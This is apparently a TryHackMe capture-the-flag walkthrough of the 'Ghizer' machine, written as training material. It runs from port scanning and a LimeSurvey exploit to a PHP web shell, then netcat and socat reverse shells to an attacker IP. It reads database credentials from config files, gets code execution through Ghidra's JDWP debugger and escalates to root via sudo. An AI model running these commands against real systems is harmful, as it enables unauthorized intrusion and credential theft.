Today we are going to be going after Ghizer on TryHackMe. This machine says it has multiple we applications on it, so let’s dive in.
First we start off with our favorite port scanning tool Nmap. We use -p- to scan all ports and -T4 for second fastest speed. Finally use –reason to understand why Nmap determined a port to be opened or closed.
nmap -p- -T4 –reason <Target>
Great now let’s service scan the open ports.
nmap -p21,80,443,18002,36699,46471 -T4 -sV –reason <Target>
We seem to have some anonymous ftp server. Let’s start enumerating the web servers on ports 80 and 433 and then investigate port 21.
Since port 80 and 443 are open and appear to be web servers, we can enumerate the site with GoBuster. Let’s use some extensions in GoBuster so we can add in php, bak, and txt for more results. This way if there are files with these extensions we have a shot at finding them.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<Target> -x .php,.bak,.txt
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://<Target> -x .php,.bak,.txt
While these run, go ahead and check out port 21. Let’s use an ftp client to connect. Maybe we can use the anonymous user that we saw in the nmap scan.
ftp <TargetIP> 21
For the user enter anonymous and for the password enter anonymous.
Looks like we don’t have any permissions in this folder /home/lucrecia/ftp/ directory, but we have discovered a possible user.
Back to our results there’s a page http://<TargetIP>/admin let’s visit that page. It redirect us to a login page located at http://<TargetIP>/index.php/admin/authetnication/sa/login
We can try to login with default credentials, after searching through Google I found admin:password. If these don’t work, you have to restart the machine, I had issues with my first machine.
Once we login we can see the version at the bottom right.
Let’s search Google for an exploit. There’s one for versions under 3.16.
LimeSurvey < 3.16 uses an old version of “TCPDF” library, this version is vulnerable to a Serialization Attack via the “phar://” wrapper.
https://www.exploit-db.com/exploits/46634
If we look at def main(): We can see that we only need to supply the target IP without additional directories. This is because when we run the exploit it appends /index.php/admin/authentication/sa/login to the target.
Save this as LimeSurveyExploit.py
python2 LimeSurveryExploit.py http://<Taget> admin password
I tried to upgrade my shell using python but it appears we may be in a limited shell, let’s try socat.
Python attempt to upgrade
which python
/usr/bin/python -c ‘import pty; pty.spawn(“/bin/bash”)’
What this does is import the module pty and then attempts to spawn a process, in our case /bin/bash. Since that didn’t work that’s move on to Socat.
First we need to determine what architecture this machine is x86 or x64.
uname -m
I downloaded the socat binary from https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat onto my attacker machine. We grab the x86_64 version because that’s what architecture we have on our target. Now let’s server up an HTTP server using python. Finally go ahead and download the binary onto the target machine.
On your attacker machine
python3 -m http.server 7777
In another tab set up a socat listener
socat file: `tty`,raw,echo=0 tcp-listen:1337
On the target machine
cd /tmp
wget http://<attackerIP>:1337/socat
chmod +x socat
./socat tcp-connect:<AttackerIP>:1337 exec:/bin/bash,pty,stderr,setsid,sigint,sane
It seems we may be in some limited shell. I noticed a lot of the commands I was running weren’t working properly. Let’s what is available for us.
Shell.php sounds like it could be an interesting file, let’s cat it out.
cat shell.php
It appears we may be able to pass a command to shell.php. Let’s visit the page to confirm we can access it.
It brings us to a white page, we may be able to pass a parameter of c to get command execution. Let’s look at the shell.php cat again.
<?php system($_GET[“c”]); ?>
So this script calls system which will execute whatever “c” is equal to on the machine. Visiting http://<TargetIP>/shell.php?c=ls will execute the ls command.
http://<TargetIP>/shell.php?c=chmod +x socat; ls -lah socat
Maybe we need an upgraded shell, let’s go back to socat, but this time let’s run commands through netcat.
First use shell.php to check to see if we have netcat on the target
http://<TargetIP>/shell.php?c=which nc
Let’s see if we can use the -e option to execute /bin/bash through the php shell.
On the attacker machine setup a netcat listener.
nc -nlvp 5555
Now in the web browser run
http://<TargetIP>/shell.php?c=/bin/nc -e /bin/bash <AttackerIP> 5555
At this point we have caught our shell. Let’s check that socat is still here on the machine.
ls -lah | grep “socat”
Great it’s there, now let’s try and make it executable.
chmod +x socat
ls -lah | grep “socat”
Now it’s executable! Let’s get a reverse shell via socat.
Start a listener using netcat on your attacker machine.
nc -nlvp 4545
Now on your terminal with a netcat connection run
./socat tcp-connect:<AttackerIP>:4545 exec:/bin/bash,pty,stderr,setsid,sigint,sane
Check your netcat listener for an upgraded shell!
If you check the home directories we can find a user veronica.
ls -lah /home/
Let’s keep hunting we need some credentials for something. Running netstat -antp we can see what ports are open on the machine.
It looks like Sql may be on the machine since port 3306 is listening. That would make sense because limesurvery probably stores it’s usernames and passwords in this database. Hunting around we find a config.php file in /var/www/html/limesurvey/application/config/.
cat /var/www/html/limesurvey/application/config/config.php
Let’s keep searching around. If we cd up a few directories into /var/www/html, there’s a wordpress directory.
When we visit http://<TargetIP> it says there’s a plugin used to hide the wordpress login page. Which makes sense because when we visit https://<TargetIP>/wp-login.php we get redirected to https://<TargetIP>/-/-/-/-/-/-/-/-/-/-/
According to the documentation for wps-hide-login plugin, you can either modify the login page via the wp-admin page or via the database for wordpress changing the value of whl_page. https://www.greengeeks.com/tutorials/use-wps-hide-login/
Looking around for credentials we find the config file for wordpress located at /var/www/html/wordpress/wp-config.php. This has a username and password for the wordpress database.
Let’s login to the database and see if there’s anything interesting.
mysql -u wordpressuser -D wordpress -p
Now enter the password
We can list the databases using the command SHOW DATABASES;
Now we need to interact with the database and list the tables.
USE wordpress;
SHOW TABLES;
The wp_users table could contain passwords so let’s check.
select * FROM wp_users;
Looks like we just have Anny’s password hash.
We can check out the options table as well.
USE wordpress;
select * FROM wp_options;
Here I recommend just copying this out and putting it into a text editor. Then we can search for the whl_page configuration.
Looks like if we go to devtools we should be able to see the wordpress login page.
And we are able to login as Anny.
Let’s see what processes are running as veronica.
ps aux | grep “veronica”
It looks like Ghidra is running on this machine. There was an XXE vulnerability that allows for code execution via a malicious project. The issue is that we can’t actually execute ghidra as www-data. I ran ls -lah | grep “x” in /home/veronica/ghidra_9.0 directory and none of the programs are executable.
Searching around more it seems like you can inject a process into the Ghidra debugger. Ghidra (Debug Mode) Remote Code Execution Through JDWP Debug Port
To do this we attach to the debugger, list out the classes, set a break point, and finally spawn a process which will be our reverse shell.
First attach to the ghidra debugger on port 18001.
jdb -attach 127.0.0.1:18001
Then run classpath to know which classes we are pulling from. Next run classes to see what classes we can interact with.
Finally apache looks like a good one according to the video.
stop in org.apache.logging.log4j.core.util.watchManager$WatchRunnable.run()
Start a listener on port 1337 on the Attacker machine.
nc -nlvp 1337
When the breakpoint is hit we can start a new java Runtime to run our reverse shell.
print new java.lang.Runtime().exec.exec(“nc <AttackerIP> 1337 -e /bin/bash”)
Now on your new shell upgrade it to a full shell using python.
/usr/bin/python -c ‘import pty;pty.spawn(“/bin/bash”)’
Let’s start by seeing if veronica can run any commands as root.
sudo -l
Great we can run this base.py program as root. Let’s take a look at what it is doing.
cat base.py
This does not give us a way to get a root shell without some modifications. Since we can’t edit it, let’s just delete the file and recreate it.
rm -rf base.py
Now we need to execute some command from python that will give us a shell. We could get a reverse shell, but this way is easier.
echo “import os” > base.py
echo ‘os.system(“/bin/bash”)’ >> base.py
Finally run the new program, which will spawn a root bash shell.
sudo /usr/bin/python3.5 /home/veronica/base.py
I hope you enjoyed this machine. Just remember once you compromise a system, be sure to check what other programs are running. There’s always a possibility that there is command injection in a custom written script, or a way to just delete a file and make the same one with your own code.